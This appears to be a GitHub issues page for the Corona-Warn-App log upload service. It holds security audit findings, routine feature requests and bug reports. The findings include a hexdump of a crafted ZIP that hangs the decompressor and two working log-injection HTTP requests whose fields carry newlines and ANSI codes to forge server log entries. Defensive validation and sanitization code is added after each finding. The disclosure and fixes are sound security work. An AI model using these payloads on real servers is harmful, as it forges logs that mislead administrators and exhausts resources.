corona-warn-app / cwa-log-upload

The log upload service is the counterpart of the log upload in the app. It enables the app developers to analyze the log data uploaded to the CWA infrastructure to identify the root cause of bugs that only occur under rare conditions and are not easy to reproduce.

License: Apache License 2.0

Dockerfile 0.24% Java 62.40% CSS 8.70% JavaScript 22.81% HTML 5.86%

cwa-log-upload's Issues

[BSI][20210511][v2.2] ZIP Processing Resource Exhaustion

Rating: Informational

The JavaScript that is used to process the ZIP archives is vulnerable to a resource exhaustion attack. More specifically, it is possible to upload a specially crafted ZIP file which leads to an endless loop while decompressing the file. As the file decompression is done in a separate worker, this does not affect the main process of the log upload browser tab. Therefore, the implications of this issue are rather low. On the tester’s machine the endless loop resulted in a very high CPU usage, however, as the main process of the tab is not affected, it can simply be closed to stop the loop.

Due to time restrictions, the cause of this issue has not been further investigated. The issue has been tested in a setup isolated from the cwa-log-upload application to rule out any possible influence by the application itself. This test showed that the issue, in fact, stems from the library.

Proof of Concept
The screenshot below shows that the file is stuck while decompressing and the processor utilization of the worker goes up to about 100%:
[screenshot not included]

Below is a hexdump of the offending ZIP file. The file is a partially corrupted ZIP file which contains two files (a and P) with a size of 34 and 19. It was created while randomly corrupting ZIP files; therefore the corruption does not follow a specific format.

00000000 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 |PK..............|
00000010 00 00 00 00 00 00 00 00 00 00 01 00 00 00 61 4a |..............aJ|
00000020 84 82 24 9c 00 10 00 00 ff ff 50 4b 07 08 6f b2 |..$.......PK..o.|
00000030 bf e3 0b 00 00 00 22 00 00 00 50 4b 03 04 14 00 |......"...PK....|
00000040 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 01 00 00 00 62 4a 4c 4a 4e 49 4d 4b |........bJLJNIMK|
00000060 cf 30 30 34 32 36 ff 7f 33 b7 b0 34 00 04 00 00 |.00426..3..4....|
00000070 ff ff 50 4b 07 08 da c9 f3 fc 19 00 00 00 13 00 |..PK............|
00000080 00 00 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 |..PK............|
00000090 00 00 6f b2 bf e3 0b 4c 00 00 22 00 00 00 01 00 |..o....L..".....|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 61 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 00 |aPK.............|
000000c0 00 da c9 f3 fc 19 00 00 00 13 00 00 00 01 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 3a 00 00 00 50 |...........:...P|
000000e0 4b 05 06 00 00 00 00 02 00 02 00 5e 00 00 00 82 |K..........^....|
000000f0 00 00 00 00 00 |.....|
000000f5
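The report leaves the library-side cause open, but an archive like the one above can be rejected before any decompressor sees it: the end-of-central-directory record, the central directory and the local file headers are redundant, so a crafted or corrupted file usually contradicts itself. The following is an added example (not code from cwa-log-upload or from the ZIP library the report tested) of such a structural pre-check, written for a browser worker or Node; it parses the hexdump from the report back into bytes and lists every inconsistency it finds. The 10 MB uncompressed-size budget is an assumed value.

```javascript
// Added example (not part of cwa-log-upload): structural checks a browser
// worker could run on an uploaded ZIP before handing it to a decompression
// library, so that an archive whose headers contradict each other is rejected
// up front instead of being fed to inflate. Input: the hexdump from the report.
const REPORT_HEXDUMP = `
00000000 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 |PK..............|
00000010 00 00 00 00 00 00 00 00 00 00 01 00 00 00 61 4a |..............aJ|
00000020 84 82 24 9c 00 10 00 00 ff ff 50 4b 07 08 6f b2 |..$.......PK..o.|
00000030 bf e3 0b 00 00 00 22 00 00 00 50 4b 03 04 14 00 |......"...PK....|
00000040 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 01 00 00 00 62 4a 4c 4a 4e 49 4d 4b |........bJLJNIMK|
00000060 cf 30 30 34 32 36 ff 7f 33 b7 b0 34 00 04 00 00 |.00426..3..4....|
00000070 ff ff 50 4b 07 08 da c9 f3 fc 19 00 00 00 13 00 |..PK............|
00000080 00 00 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 |..PK............|
00000090 00 00 6f b2 bf e3 0b 4c 00 00 22 00 00 00 01 00 |..o....L..".....|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 61 50 4b 01 02 14 00 14 00 08 00 08 00 00 00 00 |aPK.............|
000000c0 00 da c9 f3 fc 19 00 00 00 13 00 00 00 01 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 3a 00 00 00 50 |...........:...P|
000000e0 4b 05 06 00 00 00 00 02 00 02 00 5e 00 00 00 82 |K..........^....|
000000f0 00 00 00 00 00 |.....|
000000f5
`;

// Parse "offset  bb bb ... |ascii|" lines back into bytes, checking for gaps.
function hexdumpToBytes(text) {
  const bytes = [];
  for (const line of text.split("\n")) {
    const m = line.match(/^([0-9a-f]{8})\s+((?:[0-9a-f]{2}\s)+)\|/i);
    if (!m) continue;                      // blank lines and the trailing offset-only line
    if (parseInt(m[1], 16) !== bytes.length) throw new Error(`gap in hexdump at ${m[1]}`);
    for (const h of m[2].trim().split(/\s+/)) bytes.push(parseInt(h, 16));
  }
  return Uint8Array.from(bytes);
}

const u16 = (b, o) => b[o] | (b[o + 1] << 8);
const u32 = (b, o) => (b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24)) >>> 0;
const ascii = (b, o, n) => String.fromCharCode(...b.subarray(o, o + n));
const LOCAL_SIG = 0x04034b50, CENTRAL_SIG = 0x02014b50, EOCD_SIG = 0x06054b50;

// Returns a list of structural problems; an empty list means the EOCD record,
// the central directory and the local file headers agree with each other.
function checkZipStructure(b, maxUncompressed = 10 * 1024 * 1024) {
  const problems = [];
  // The EOCD record is the last 22 bytes unless an archive comment (<= 65535 bytes) follows it.
  let eocd = -1;
  for (let i = b.length - 22; i >= Math.max(0, b.length - 22 - 65535); i--) {
    if (u32(b, i) === EOCD_SIG) { eocd = i; break; }
  }
  if (eocd < 0) return ["no end-of-central-directory record found"];
  const entries = u16(b, eocd + 10), cdSize = u32(b, eocd + 12), cdOffset = u32(b, eocd + 16);
  if (cdOffset + cdSize !== eocd) {
    problems.push(`central directory ${cdOffset}+${cdSize} does not end at the EOCD record (${eocd})`);
  }
  const cdEnd = Math.min(cdOffset + cdSize, eocd);
  let pos = cdOffset, seen = 0, declaredTotal = 0;
  while (pos + 46 <= cdEnd && u32(b, pos) === CENTRAL_SIG) {
    const compSize = u32(b, pos + 20), uncompSize = u32(b, pos + 24);
    const nameLen = u16(b, pos + 28), extraLen = u16(b, pos + 30), commentLen = u16(b, pos + 32);
    const localOffset = u32(b, pos + 42);
    const name = ascii(b, pos + 46, nameLen);
    declaredTotal += uncompSize;
    if (localOffset + 30 > cdOffset || u32(b, localOffset) !== LOCAL_SIG) {
      problems.push(`entry '${name}': no local file header at offset ${localOffset}`);
    } else {
      // The local header must describe the same file, and its compressed data
      // must lie entirely before the central directory.
      const localName = ascii(b, localOffset + 30, u16(b, localOffset + 26));
      if (localName !== name) problems.push(`entry '${name}': local header names it '${localName}'`);
      const dataStart = localOffset + 30 + u16(b, localOffset + 26) + u16(b, localOffset + 28);
      if (dataStart + compSize > cdOffset) {
        problems.push(`entry '${name}': ${compSize} compressed bytes at ${dataStart} run past the central directory (${cdOffset})`);
      }
    }
    pos += 46 + nameLen + extraLen + commentLen;
    seen++;
  }
  if (seen !== entries) problems.push(`EOCD declares ${entries} entries but ${seen} were found`);
  if (declaredTotal > maxUncompressed) problems.push(`declared uncompressed size ${declaredTotal} exceeds budget ${maxUncompressed}`);
  return problems;
}

const reportProblems = checkZipStructure(hexdumpToBytes(REPORT_HEXDUMP));
console.log(reportProblems.length ? reportProblems.join("\n") : "structure ok");
```

On the report's file the check finds three contradictions: the central directory overruns the EOCD record by one byte, the central directory claims 19467 compressed bytes for entry `a` in a 245-byte file, and the local header of the entry the central directory calls `P` names it `b`. Any one of them is reason enough to refuse the upload without decompressing; the uncompressed-size budget additionally bounds the work a well-formed archive may demand, and a watchdog that terminates the worker after a time limit covers library bugs the check does not anticipate.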

Split features

The features Upload API and Log-Viewer-Portal need to be separated by spring profiles.

AK:

  • Define 2 profiles
  • profile "portal": Only Portal and Download API
  • profile "api": Only Upload API
  • Cleanup Job runs only in "api" profile
  • Add Shedlock to Cleanup Job

Document 'Overview' is checked-in duplicated

Describe the bug

The document 'Overview.md' is available at two different positions in the repo:

  1. at doc/Overview.md
  2. at src/doc/Overview.md

Note: This needs to be fixed asap.
The two versions are already out of sync.

Expected behaviour

Steps to reproduce the issue

Technical details

  • Host Machine OS (Windows/Linux/Mac):

Possible Fix

Merge the two versions, and then delete one.

Additional context

[BSI][20210511][v2.2] Log Injection

Rating: Medium

The cwa-log-upload server is vulnerable to a log injection attack at two individual endpoints. This enables an unauthenticated (as well as an authenticated) attacker to violate the integrity of the cwa-log-upload server logs by injecting arbitrary log messages. Note that this does not affect the user-supplied log file ZIP archives, but the actual server logging output. The injected log entries are not easily distinguishable from legitimate entries that have been appended by the cwa-log-upload server itself.

This issue could be abused for social engineering attacks on administrative personnel by injecting malicious messages into log files. These could include false error conditions that instruct administrators to, for example, contact someone or interact with services or systems by restarting them.

In this specific case, the endpoints /api/logs and /portal/search (which requires an authenticated portal user) are affected.

Proof of Concept:

The following screenshot shows a successfully injected log entry via the /api/logs endpoint:
[screenshot not included]

Request:

POST /api/logs HTTP/1.1
Host: localhost:8085
User-Agent: curl/7.64.1
Accept: */*
Content-Type: multipart/form-data; boundary=11D989FA-25A8-4082-A4D2-703A4A27D392
Cwa-Otp: 357CC67D-3D97-4E4F-8F5B-E4730B71B4BD
Content-Length: 881
Connection: close
--11D989FA-25A8-4082-A4D2-703A4A27D392
Content-Disposition:form-data; name="file"; filename="filename.txt
[2m2021-05-07 17:10:17.277 [0;39m [32m INFO [cwa-log-upload,,] [0;39m [35m50287 [0;39m [2m--- [0;39m
,→ [2m[ main] [0;39m [36ma.c.logupload.LogUploadApplication [0;39m [2m: [0;39m Injected Log Line
Content-Type:application/zip
Content-Length: 458
PK [...]
--11D989FA-25A8-4082-A4D2-703A4A27D392--

Response:

HTTP/1.1 201
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Date: Fri, 07 May 2021 15:14:58 GMT
Connection: close
Content-Length: 63
{"id":"C0B1DBCE400C8610C2FE","hash":"PthK38bUN7JLVgyyk8PmpQ=="}

The following screenshot shows a successfully injected log entry via the /portal/search endpoint, which requires an authenticated user.
[screenshot not included]

It was created using the following request:

Request

POST /portal/search HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8085
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
,→ Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q
,→ =0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8085/portal/start?
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,de;q=0.7
Cookie: JSESSIONID=0DD040DF4AD43C531993DD103AE948BE
Content-Length: 357
logId=%0a%1B%5B2m2021-05-07+17%3A10%3A17.277%1B%5B0%3B39m+%1B%5B32m+INFO+%5Bcwa-log-upload%2C%2C%5D%1B
,→ %5B0%3B39m+%1B%5B35m50287%1B%5B0%3B39m+%1B%5B2m---%1B%5B0%3B39m+%1B%5B2m%5B+++++++++++main%5D
,→ %1B%5B0%3B39m+%1B%5B36ma.c.logupload.LogUploadApplication++++++%1B%5B0%3B39m+%1B%5B2m%3A%1B%5
,→ B0%3B39m+Injected+Log+Line&_csrf=6a896d20-cdb6-42b5-bd2f-f94e49752a67

Response:

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Language: en-GB
Date: Fri, 07 May 2021 15:25:38 GMT
Connection: close
Content-Length: 1458
<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="utf-8"/>
<meta content="default-src 'self' style-src 'unsafe-inline'" http-equiv="Content-Security-Policy">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<link href="/portal/static/css/cwa.css" rel="stylesheet" type="text/css"/>
<title>Corona Warn App - Log Upload</title>
<link href="/portal/static/img/c-19_logo.png" rel="icon"/>
<script src="/portal/static/js/logout.js"></script>
</head>
<body>
[...]
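Both requests work the same way: a value the server copies into its own log (the multipart filename, the `logId` form field) carries a line break followed by text shaped like a complete log entry, plus ANSI colour sequences so it renders like one. The fix is to never let user-controlled bytes decide where a log line ends. The following is an added example, not code from cwa-log-upload, showing two standard ways to do that: escaping every control character before the value is spliced into free text, and structured (JSON) logging where the value stays a field. The timestamp, pid and logger name are constructed to resemble the Spring Boot layout visible in the report, and the payload is a constructed one in the same shape as the report's.

```javascript
// Added example (not part of cwa-log-upload): two ways to keep a user-controlled
// value such as an uploaded filename or a searched log id from forging server
// log entries. Timestamp, pid and logger name are constructed to resemble the
// layout shown in the report; the payload below is constructed as well.

// 1) Escape every control character (CR, LF, ESC, DEL, C1 controls) so the
//    value can only occupy the single line it was logged on, and cap its length.
function sanitizeForLog(value, maxLen = 200) {
  let out = String(value).replace(/[\u0000-\u001f\u007f-\u009f]/g,
    c => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0"));
  if (out.length > maxLen) out = out.slice(0, maxLen) + "...[truncated]";
  return out;
}

// Single-line text layout modelled on the server log in the report.
function textLogLine(level, logger, message) {
  return `2021-05-07 17:10:17.277 ${level.padStart(5)} [cwa-log-upload,,] 50287 --- [main] ${logger} : ${message}`;
}

// 2) Structured logging: JSON.stringify escapes \n and \x1b itself, and the
//    user value stays a named field instead of being spliced into free text.
function jsonLogLine(level, logger, message, fields) {
  return JSON.stringify({ ts: "2021-05-07T17:10:17.277", level, logger, message, ...fields });
}

// Constructed payload in the shape the report describes: a newline followed by
// text that imitates a complete log entry, with an ANSI colour sequence.
const PAYLOAD = "filename.txt\n\x1b[32m INFO [cwa-log-upload,,] 50287 --- [main] a.c.logupload.LogUploadApplication : Injected Log Line";

function demo() {
  const logger = "a.c.logupload.LogUploadApplication";
  // Unsanitised interpolation: this is the behaviour the report demonstrates.
  const unsafe = textLogLine("INFO", logger, `received upload ${PAYLOAD}`);
  // Escaped interpolation: one line, the injected "entry" is visibly part of the value.
  const safe = textLogLine("INFO", logger, `received upload ${sanitizeForLog(PAYLOAD)}`);
  // Structured: one line, and a consumer gets the original value back via JSON.parse.
  const json = jsonLogLine("INFO", logger, "received upload", { filename: PAYLOAD });
  return { unsafe, safe, json };
}

const out = demo();
console.log(out.unsafe);  // two lines; the second reads like a genuine entry
console.log(out.safe);    // one line; \x0a and \x1b[32m appear as text, not control codes
console.log(out.json);    // one line; JSON.parse(out.json).filename === PAYLOAD
```

The escaping variant keeps existing text-based log tooling working; the JSON variant is preferable when logs are shipped to an aggregator, because the parser, not the renderer, decides where a record ends. In either case the same treatment belongs on every value the server echoes into its log, not only the two fields the report exercised.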

CWA log upload is broken

Describe the bug

Uploading logs from the app to the server fails with an error message.

Expected behaviour

Uploading an error log should be possible.

Steps to reproduce the issue

Differ between iOS & Android, should be clear.

Possible Fix

@MikeMcC399 found that https://logupload.coronawarn.app has a new SSL certificate issued today. Maybe this is the root cause?

Additional context

This issue was originally reported by @diablodale via corona-warn-app/cwa-app-android#5089.

implement TOTP based verification

For validating data upload, the origin has to be proved to be a real phone.
The phone will send a TOTP Token in the request header to indicate that.
The log upload service must verify this token against the cwa infrastructure for validity.
